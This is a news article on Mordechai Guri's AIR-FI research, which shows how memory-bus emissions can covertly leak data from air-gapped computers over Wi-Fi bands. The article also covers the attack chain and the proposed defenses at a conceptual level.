Mordechai Guri, an Israeli cyber security researcher who focuses on covert side channel attacks, has devised yet another way to undermine air gapping – the practice of keeping computers disconnected from any external network for the sake of security.
In a newly released working paper [PDF], “AIR-FI: Generating Covert Wi-Fi Signals from Air-Gapped Computers,” Guri, head of research and development at Ben-Gurion University of the Negev, Israel’s Cyber-Security Research Center, describes a technique for turning DDR SDRAM buses into transmitters that can spew sensitive data.
The technique is envisioned as part of the elaborate attack chain required to compromise highly secure systems that are isolated from public networks.
The first step in this process involves getting malware onto the isolated hardware, either by intercepting the target system and compromising it during the manufacturing or shipping process or by adding malicious code after the hardware has been installed through an infected peripheral like a USB drive.
OK, so you’ve air-gapped that PC. Cut the speakers. Covered the LEDs. Disconnected the monitor. Now, about the data-leaking power supply unit…
Without that, the attack goes nowhere. But these sorts of espionage efforts, mainly a concern for organizations operating critical systems and for potential adversaries like spy agencies, have succeeded: As an example, the paper cites the infamous Stuxnet worm, which a decade ago compromised supervisory control and data acquisition (SCADA) systems and damaged something like 1,000 centrifuges at a uranium enrichment facility in Iran. The destructive code, it’s claimed, was introduced to affected systems via a USB thumb drive.
Once a network-disconnected system has been compromised, the question becomes how to exfiltrate data from the machine without anyone noticing. It turns out there are more than a few ways to conduct what’s known as a TEMPEST (Telecommunications Electronics Materials Protected from Emanating Spurious Transmissions) attack, which involves covert signaling sent via electromagnetic, acoustic, thermal, optical, or vibrational channels.
Guri’s paper lists various publicly disclosed methods, many of which he helped develop. But AIR-FI is the latest technique he’s devised. It’s a method for sending data via Wi-Fi signals when the target device doesn’t have Wi-Fi capability.
When Wi-Fi isn’t proper Wi-Fi
“The AIR-FI attack introduced in this paper does not require Wi-Fi related hardware in the air-gapped computers,” Guri explains in his paper. “Instead, we show that an attacker can exploit the DDR SDRAM buses to generate electromagnetic emissions in the 2.4 GHz Wi-Fi bands and encode binary data on top of it.”
AIR-FI works by transferring data to the data bus, which generates an electromagnetic emission. “Since the clock speed of memory modules is typically around the frequency of 2.4 GHz or its harmonics, the memory operations generate electromagnetic emissions around the IEEE 802.11b/g/n Wi-Fi frequency bands,” the paper explains.
For memory modules where that’s not the case, the setup malware would need to overclock or underclock the memory speed to generate emissions in the frequency of Wi-Fi bands or their harmonics. This should be possible in software or via BIOS/UEFI configuration. Intel, the paper says, allows the timing parameters of installed memory to be altered using the Extreme Memory Profile (XMP) spec.
From there it’s a matter of transmitting data in packets that include a preamble, payload and error-detecting code and ensuring the receiving device is listening.
Guri’s experimental setup demonstrated that such signals can be picked up within several meters of the air-gapped machine, though the rate of transmission is rather low: 1-100 bit/sec. You can see it in action below.
The technique doesn’t require any special privileges and works from within a virtual machine. It does require a nearby Wi-Fi capable receiving device, but those turn out to be fairly common in office or industrial environments – any suitably prepared mobile phone, computer, or IoT device would do.
Guri suggests various potential defenses, such as not allowing network-capable devices near air-gapped hardware, implementing Wi-Fi jamming, muddying any potential covert Wi-Fi signal with a background process running random memory/CPU operations, and Faraday shielding.
But the most likely defense against this technique is how much easier it is to conduct network-based attacks. When US government agencies install subverted Orion network monitoring software from SolarWinds, giving hackers the keys to the kingdom, it’s clear there’s a lot of low-hanging fruit to be had without the bother of building a bridge to an air-gapped machine. ®